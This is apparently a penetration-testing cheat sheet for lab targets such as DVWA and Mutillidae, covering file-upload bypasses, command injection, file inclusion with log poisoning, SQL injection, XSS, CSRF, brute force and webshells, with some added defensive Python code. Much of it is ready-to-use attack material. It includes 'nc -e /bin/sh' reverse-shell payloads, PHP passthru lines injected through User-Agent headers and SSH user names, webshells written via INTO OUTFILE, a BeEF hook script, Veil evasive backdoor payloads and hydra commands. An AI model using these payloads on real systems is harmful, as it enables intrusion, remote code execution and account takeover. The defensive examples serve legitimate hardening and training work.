Common Penetration Testing Techniques
1. Information gathering
IP address
domain name info
technologies used
other websites on the same server
DNS records
unlisted files, sub-domains, directories
Main tasks: whois lookup for the site's registration details, subdomain scanning, directory scanning to find sensitive information.
Most of the sites below are hosted abroad; if they cannot be reached, try going through a proxy or VPN.
http://whois.domaintools.com
http://toolbar.netcraft.com/site_report?url=
https://www.robtex.com
2. File upload
The basis for connecting to a backdoor: you must know the path where the uploaded file is stored.
weevely generate <password> <file name> ——— generates a PHP backdoor (agent) file
weevely <url to file> <password> ——— connects to the uploaded backdoor
Three cases
1) Upload the backdoor code directly (no check at all)
2) Bypass the file-type check: rename filename.php -> filename.jpg so the client-side check passes, then intercept the request in Burp Suite and change the name back, filename.jpg -> filename.php (works when the server does not repeat the check)
3) Same interception, but with a double extension: filename.jpg -> filename.php.jpg (works when the server only looks at the last extension while the web server's handler still maps .php anywhere in the name to PHP)
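As an added example (not code from the original page), here is the kind of server-side check that cases 2 and 3 above get past, next to a check that survives them by ignoring the client's file name altogether. The allowlist, the magic-byte table and the sample file contents are constructed for the example; whether the target's web server executes .php.jpg is an assumption about the target, not something this code can see.

```python
import os
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}  # assumed image allowlist
# File signatures used to verify the real content type (assumed, standard values)
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def weak_extension_check(filename: str) -> bool:
    """A check that only inspects the trailing extension of the client-supplied name.

    It passes filename.php.jpg (case 3): if the web server maps .php anywhere in the
    name to the PHP handler, the upload still executes.  And since it trusts nothing
    but the name, a request whose extension was flipped back to .php after a
    client-side check (case 2) is only caught if this check runs server-side at all.
    """
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXT


def sniff_type(data: bytes):
    """Return the image type indicated by the file's leading bytes, or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def safe_store_name(filename: str, data: bytes):
    """Hardened variant: return the name the upload is stored under, or None to reject.

    - exactly one extension, and it must be on the allowlist
    - the content must really be that image type (magic bytes), so a PHP file
      renamed to .jpg is rejected even though its name looks fine
    - the stored name is random and carries only the allowlisted extension, so
      nothing the client chose (such as an embedded .php) survives on disk
    """
    base = os.path.basename(filename)  # drop any directory part in the name
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return None  # "shell.php.jpg" or ".htaccess" -> reject
    ext = parts[1].lower()
    if ext not in ALLOWED_EXT:
        return None
    kind = sniff_type(data)
    if kind is None or (kind != ext and not (kind == "jpg" and ext == "jpeg")):
        return None  # name says image, bytes say otherwise
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample inputs: a JPEG-looking header and a PHP one-liner
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 32
PHP_BYTES = b'<?php system($_GET["c"]); ?>'
```

The point of the random stored name is that it makes the extension question moot: even if the check had a gap, the attacker no longer controls what the file is called on disk, so neither the double-extension nor the renamed-in-flight trick gives them a .php path to request.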
3. Code execution
Where a web form passes its input to a system command, on Linux you can append ; or | to chain your own command, which then runs as the web server's user (for example to spawn a reverse shell):
e.g.:
20.20.10.223;nc -e /bin/sh nc_server_ip port
20.20.10.223|nc -e /bin/sh nc_server_ip port
Listener for the reverse shell (start it on the attacker machine first; note that -e exists only in traditional netcat and ncat builds, OpenBSD netcat lacks it)
nc -vv -l -p 8080 ——— listens on the port
4. Local and remote file inclusion
A link with a file inclusion flaw: ?page=/../../../../../etc/passwd
http://192.168.101.3/dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd
Files worth including for poisoning (they contain attacker-controlled text that PHP executes when the file is included; the web server user must be able to read them, and auth.log is often root:adm 0640, in which case that route fails):
/proc/self/environ
/var/log/auth.log
/var/log/apache2/access.log
http://192.168.101.3/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ
Intercept the request with Burp Suite and replace the User-Agent header with PHP code; it ends up in /proc/self/environ (HTTP_USER_AGENT) and in the access log:
User-Agent: <?phpinfo();?>
User-Agent: <?passthru("nc -e /bin/sh 192.168.101.3 8888");?>
(These one-liners use PHP short open tags; if short_open_tag is off, write <?php ... ?> instead. The IP and port in the nc payload must be the attacker's listener, not the target.)
http://192.168.101.3/dvwa/vulnerabilities/fi/?page=/../../../../../var/log/auth.log
Poison auth.log with an SSH login attempt whose user name is the PHP code (192.168.101.3 is the target); sshd writes the invalid user name to the log verbatim:
ssh '<?passthru("nc -e /bin/sh 192.168.101.3 8888");?>'@192.168.101.3
On the attacker machine, listen on the port: nc -vv -l -p 8888
Base64-encoding the command avoids the nested quotes and any characters the shell or the log might mangle (the string below decodes to nc -e /bin/sh 192.168.101.3 8888):
ssh '<?passthru(base64_decode("bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjEwMS4zIDg4ODg="));?>'@192.168.101.3
Remote file inclusion
Make sure allow_url_include=On in php.ini (it is Off by default, and allow_url_fopen must be On as well).
Create a file containing <?passthru("nc -e /bin/sh 192.168.101.3 8888");?> and host it where the target can fetch it. Serve it with an extension your own server will not execute (e.g. .txt), otherwise the hosting server runs the code instead of handing it over.
Then include it remotely on the target, as follows:
http://192.168.101.3/dvwa/vulnerabilities/fi/?page=http://<attacker ip>/<path to file>
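Added example, not the page's or DVWA's code: a resolver for a ?page= parameter that refuses both the traversal and the remote-URL forms above, plus a small detector for the log-poisoning pattern (a PHP open tag inside sshd's "Invalid user" line or an Apache User-Agent). The include directory, the allowlist and the log lines are constructed for the example.

```python
import os
import re

# Assumed layout (not from the page): the directory ?page= is meant to read from
INCLUDE_DIR = "/var/www/dvwa/vulnerabilities/fi/pages"
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}  # assumed allowlist


def resolve_vulnerable(page: str) -> str:
    """What include($_GET['page']) effectively does: the raw value is the path.

    A leading "/" or "../" walks out of the web root, and "http://..." is fetched
    remotely when allow_url_include is on.
    """
    return page


def canonical_path_within(base: str, candidate: str):
    """Resolve candidate relative to base; return it only if it stays inside base."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, candidate))
    # os.path.join discards base when candidate is absolute, and realpath collapses
    # "../", so the containment test below catches both traversal styles.
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target


def resolve_hardened(page: str):
    """Return the absolute path to include, or None to refuse.

    1. refuse anything that looks like a URL (remote inclusion)
    2. accept only names on an allowlist
    3. as a second layer, resolve the path and require it to stay under INCLUDE_DIR
    """
    if re.match(r"^[a-z][a-z0-9+.-]*://", page, re.I):
        return None
    if page not in ALLOWED_PAGES:
        return None
    return canonical_path_within(INCLUDE_DIR, page)


# Log poisoning detection: a PHP open tag has no business in an auth log or a
# User-Agent.  ("<?xml" in a legitimate UA would also trip this; rare enough to accept.)
PHP_TAG = re.compile(r"<\?")


def poisoned_log_lines(lines):
    """Return (index, line) for every log line that carries a PHP open tag."""
    return [(i, line) for i, line in enumerate(lines) if PHP_TAG.search(line)]


# Constructed sample log lines (not real captures): sshd and Apache combined-log format
SAMPLE_LOG = [
    "Mar  3 10:14:02 target sshd[2211]: Accepted password for dvwa from 192.168.101.5 port 50122 ssh2",
    'Mar  3 10:15:40 target sshd[2230]: Invalid user <?passthru("nc -e /bin/sh 192.168.101.3 8888");?> from 192.168.101.3 port 51234',
    '192.168.101.3 - - [03/Mar/2024:10:16:01 +0000] "GET /dvwa/ HTTP/1.1" 200 512 "-" "<?phpinfo();?>"',
    '192.168.101.5 - - [03/Mar/2024:10:16:09 +0000] "GET /dvwa/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

The allowlist is the real fix; the realpath containment check is there so that a later change to the allowlist (say, someone adding a name with a slash in it) cannot silently reopen the traversal.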
5. SQL injection
Login bypass (Mutillidae accounts):
adminpass' and 1=1#
monkey' and 1=1#
monkey' or 1=1 #
Find the column count with ORDER BY (raise the number until the query errors):
index.php?page=user-info.php&username=admin' order by 1#&password=adminpass&user-info-php-submit-button=View+Account+Details
Then UNION SELECT with the same number of columns to see which ones are echoed back, and replace those with what you want to read:
union select 1,2,3,4,5
union select 1,database(),user(),version(),5
union select 1,table_name,null,null,5 from information_schema.tables where table_schema = "metasploit"
union select 1,column_name,null,null,5 from information_schema.columns where table_name = "accounts"
union select 1,cid,username,password,5 from accounts
DVWA (two columns echoed):
union select table_name,2 from information_schema.tables where table_schema = 'dvwa'
union select column_name,2 from information_schema.columns where table_name = 'users'
medium: single quotes are escaped, so write the string as a hex literal instead (0x64767761 is 'dvwa'):
union select table_name,2 from information_schema.tables where table_schema=0x64767761
Mixed case and inline comments to get past simple keyword filters (%23 is the URL-encoded #):
1'+uNion/**/sEleCt/**/1,2/**/%23
1'+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23
1'+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables+limit+0,1%23
1'+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables+where+table_schema='dvwa'+limit+0,1%23
SQL injection read/write file (needs the FILE privilege, and secure_file_priv must allow the path):
union select null,load_file("/etc/passwd"),null,null,null
union select null,'example example',null,null,null into outfile '/var/www/mutillidae/example.txt'
write a webshell: union select '<?passthru("nc -e /bin/sh 192.168.101.71 8080");?>',null into outfile '/tmp/reverse.php'
union select '<?passthru("nc -e /bin/sh 192.168.101.71 8080");?>',null into outfile '/var/www/dvwa/reverse.php'
Tool usage:
sqlmap -u "..." --os-shell
sqlmap -u "..." --sql-shell
For a GET injection point: sqlmap -u "URL of the injection point"
For a POST injection point: sqlmap -u "URL of the injection point" --data="POST parameters"
For an injection point in a cookie, X-Forwarded-For or another header: capture the request with Burp Suite, replace the injectable value with *, save the request to a file, then run sqlmap -r "file path"
6. XSS
Stored XSS, reflected XSS, DOM XSS
low:
<script>alert('xss')</script> works directly
<a onmouseover="alert('xss')">xss link</a>
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=# onerror="alert('xss')"></IMG>
medium: the filter strips the literal <script> tag, so change the case of the tag: <sCripT>alert('xss')</scrIpt>
<script>alert(String.fromCharCode(120,115,115,50))</script>
<script>alert(String.fromCharCode(<character codes>))</script> (put the character codes of the string you want in the argument, as in the line above)
Using BeEF:
"parameter"=<script src="http://192.168.101.71:3000/hook.js"></script>
http://192.168.101.72/dvwa/vulnerabilities/xss_r/?name=admin#
http://192.168.101.72/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.101.71:3000/hook.js"></script>#
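Added example (not DVWA's code, though the medium renderer mimics the single str_replace filter DVWA medium uses): the low, medium and hardened reflection side by side, checked against the page's payloads and one extra, the nested <scr<script>ipt> tag that a single-pass blocklist also lets through. The executes() check is a deliberately crude heuristic for the demo, not a sanitizer.

```python
import html
import re


def render_low(name: str) -> str:
    """No filtering: input is reflected straight into the page."""
    return f"<pre>Hello {name}</pre>"


def render_medium(name: str) -> str:
    """Blocklist filter like DVWA medium: removes the literal, lowercase '<script>'."""
    return f"<pre>Hello {name.replace('<script>', '')}</pre>"


def render_hardened(name: str) -> str:
    """Context-correct output encoding: every HTML-significant character becomes an entity."""
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


# Crude "would this execute" check for the demo: an unescaped script tag, or an inline
# event handler inside an unescaped tag.  Constructed for this example, not a sanitizer.
LIVE_JS = re.compile(r"<\s*script\b|<[a-z]+[^>]*\son[a-z]+\s*=", re.I)


def executes(markup: str) -> bool:
    return LIVE_JS.search(markup) is not None


# Constructed payloads: the page's own plus the nested-tag trick
PAYLOADS = {
    "plain": "<script>alert('xss')</script>",
    "case": "<sCripT>alert('xss')</scrIpt>",
    "nested": "<scr<script>ipt>alert('xss')</script>",
    "img": "<IMG SRC=# onerror=\"alert('xss')\">",
}


def survey() -> dict:
    """For each payload, report which renderer still lets it execute."""
    return {
        name: {
            "low": executes(render_low(p)),
            "medium": executes(render_medium(p)),
            "hardened": executes(render_hardened(p)),
        }
        for name, p in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, outcome in survey().items():
        print(f"{name:7} {outcome}")
```

Three of the four payloads get through the medium filter, each for a different reason: case (the match is case-sensitive), nesting (the filter runs once and its own removal reassembles the tag), and the img payload (no script tag at all, just an event handler). Encoding the output fixes all of them at once because it never tries to recognise attacks, it just makes < and quotes inert.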
Using the Veil tool: ——— generates backdoors meant to evade detection (tool installation not completed)
1) evasion
2) ordnance
use 1 ———— a few important payloads
go/meterpreter/rev_http.py
go/meterpreter/rev_https.py
go/meterpreter/rev_tcp.py
lua/shellcode_inject/flat.py
In the end, the backdoor built with Veil was still detected when it was actually implanted.
7. CSRF
Change the victim's password by sending them a link to a page that carries hidden code; the browser attaches the victim's own cookie to the forged request.
Hide the request (for example a pre-filled password-change form) in a page the user visits; as soon as it is submitted, the password is changed automatically. The defence is a per-session anti-CSRF token in the real form that the attacker's page cannot know.
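Added example, not from the page: the server-side check that defeats the attack described above, using a per-session anti-CSRF token compared in constant time plus an Origin check. The site origin and the simulated requests are constructed.

```python
import hmac
import secrets
from typing import Optional

SITE_ORIGIN = "http://192.168.101.3"  # assumed origin of the vulnerable site


def issue_csrf_token() -> str:
    """Generated once per session, kept server-side, embedded in the real form as a hidden field."""
    return secrets.token_urlsafe(32)


def password_change_allowed(session_token: Optional[str],
                            form_token: Optional[str],
                            origin_header: Optional[str]) -> bool:
    """Decide whether a password-change POST may proceed.

    The session cookie is deliberately NOT part of this decision: the browser attaches
    it to the forged request too, which is exactly why the attack works.  What the
    attacker's page cannot supply is the secret token tied to this session, and it
    cannot forge the browser-set Origin header either.
    """
    if not session_token or not form_token:
        return False  # missing token: the forged form never had one
    if not hmac.compare_digest(session_token, form_token):
        return False  # constant-time compare, so a wrong token leaks nothing by timing
    # Origin is absent on some same-origin requests in older browsers; when present it
    # must match.  Stricter deployments reject the request when it is missing.
    if origin_header is not None and origin_header != SITE_ORIGIN:
        return False
    return True


def simulate() -> dict:
    """Constructed requests: the victim's legitimate submit versus forged ones."""
    token = issue_csrf_token()
    return {
        "legitimate": password_change_allowed(token, token, SITE_ORIGIN),
        "forged, no token": password_change_allowed(token, None, "http://attacker.example"),
        "forged, guessed token": password_change_allowed(token, secrets.token_urlsafe(32), SITE_ORIGIN),
    }


if __name__ == "__main__":
    for label, allowed in simulate().items():
        print(f"{label:22} -> {'allowed' if allowed else 'blocked'}")
```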
8. Brute force
Wordlist generator: crunch (in Kali)
Brute-force tool: hydra
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -l user -P passlist.txt 192.168.0.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:incorrect"
Note: uppercase options take a wordlist, lowercase ones a single value (-l user: the user name is user; -P passlist.txt: passwords are read from passlist.txt). The last field of http-post-form is the string that appears in the response on a failed login.
9. Webshell
Ways in: file upload, file inclusion, code execution
Code execution:
Listen in Kali: nc -vv -l -p 8080
On the target side, append ; or | followed by nc -e /bin/sh <attacker ip> <port> to the injectable input
Main tools: Behinder (冰蝎), China Chopper (菜刀), Godzilla (哥斯拉), AntSword (蚁剑).